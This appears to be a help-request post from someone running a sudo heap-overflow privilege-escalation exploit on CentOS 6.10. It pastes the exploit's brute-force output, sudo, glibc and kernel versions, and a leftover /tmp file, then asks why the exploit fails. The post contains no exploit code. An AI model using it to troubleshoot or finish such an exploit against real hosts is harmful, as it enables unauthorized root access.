curr size: 0x1240
exit code: 11
curr size: 0x11a0
exit code: 11
curr size: 0x1150
exit code: 256
sudoedit: no askpass program specified, try setting SUDO_ASKPASS
curr size: 0x1160
exit code: 11
found cmnd size: 0x1150
cmnd size: 0x1150
offset to defaults: 0x0
invalid offset. exit code: 256
$ sudo -V
Sudo version 1.8.6p3
Sudoers policy plugin version 1.8.6p3
Sudoers file grammar version 42
Sudoers I/O plugin version 1.8.6p3
$ ldd --version
ldd (GNU libc) 2.12
$ uname -r
2.6.32-754.el6.x86_64
After running the exploit, the folder 'gg' was added in /tmp folder.
drwxrwxrwt. 19 root root 4096 Jul 20 19:36 .
-rwxr-xr-x. 1 user user 97 Jul 20 19:36 gg
Also, CentOS 6.10 was installed on VMware.
Thanks,
Any ideas would be appreciated.